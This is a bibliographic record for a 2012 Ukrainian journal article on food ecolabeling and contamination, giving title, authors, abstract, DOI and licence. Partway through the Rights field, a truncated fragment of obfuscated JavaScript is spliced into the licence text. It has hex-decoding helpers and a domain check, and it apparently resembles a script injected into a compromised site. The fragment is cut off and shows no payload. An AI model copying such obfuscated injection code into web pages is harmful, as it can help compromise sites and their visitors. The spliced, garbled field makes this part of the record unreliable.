Record Details

THE FEATURES OF ECOLABELING OF FOOD STUFF IN UKRAINE

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title THE FEATURES OF ECOLABELING OF FOOD STUFF IN UKRAINE
ОСОБЛИВОСТІ ЕКОЛОГІЧНОГО МАРКУВАННЯ ПРОДУКТІВ ХАРЧУВАННЯ В УКРАЇНІ
ОСОБЛИВОСТІ ЕКОЛОГІЧНОГО МАРКУВАННЯ ПРОДУКТІВ ХАРЧУВАННЯ В УКРАЇНІ
 
Creator Архіпова, Г.; Національний авіаційний університет
Проценко, Д.; Національний авіаційний університет
Тройченко, О.; Національний авіаційний університет
 
Subject contamination; ecolabeling; ecological indices; ecologically clean products; gene modified organisms; food stuff; health of population; quality; standards

генно-модифіковані організми, екологічне маркування, екологічні показники, екологічно безпечна продукція, забруднення, здоров’я населення, стандарти, харчові продукти, якість
 
Description The article is dedicated to the problem of quality and safety of food stuff in Ukraine. It deals withcontamination of food products by chemical substances and forming of gene modified organisms whichimpact the quality of the products. Additionally, some food products have been tested and ecolabeling usedin Kyiv supermarkets has been checked and studied
Розглянуто проблему якості, безпеки продуктів харчування, ступеня забруднення їххімічними речовинами та появи генно-модифікованих організмів, які впливають на якістьпродуктів. Розкрито зміст особливостей екологічного маркування. Проведено аналіздосліджень екологічного маркування на упаковках продуктів харчування в супермаркетахКиєва.Ключові слова: генно-модифіковані організми, екологічне маркування, екологічніпоказники, екологічно безпечна продукція, забруднення, здоров’я населення, стандарти,харчові продукти, якість.
Розглянуто проблему якості,  безпеки продуктів харчування,  ступеня забруднення їххімічними речовинами та появи генно-модифікованих організмів,  які впливають на якістьпродуктів.  Розкрито зміст особливостей екологічного маркування.  Проведено аналіздосліджень екологічного маркування на упаковках продуктів харчування в супермаркетахКиєва
 
Publisher National Aviation University
 
Contributor


 
Date 2012-04-20
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/135
10.18372/2306-1472.50.135
 
Source Proceedings of the National Aviation University; Том 50, № 1 (2012); 213-215
Вестник Национального авиационного университета; Том 50, № 1 (2012); 213-215
Вісник Національного Авіаційного Університету; Том 50, № 1 (2012); 213-215
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ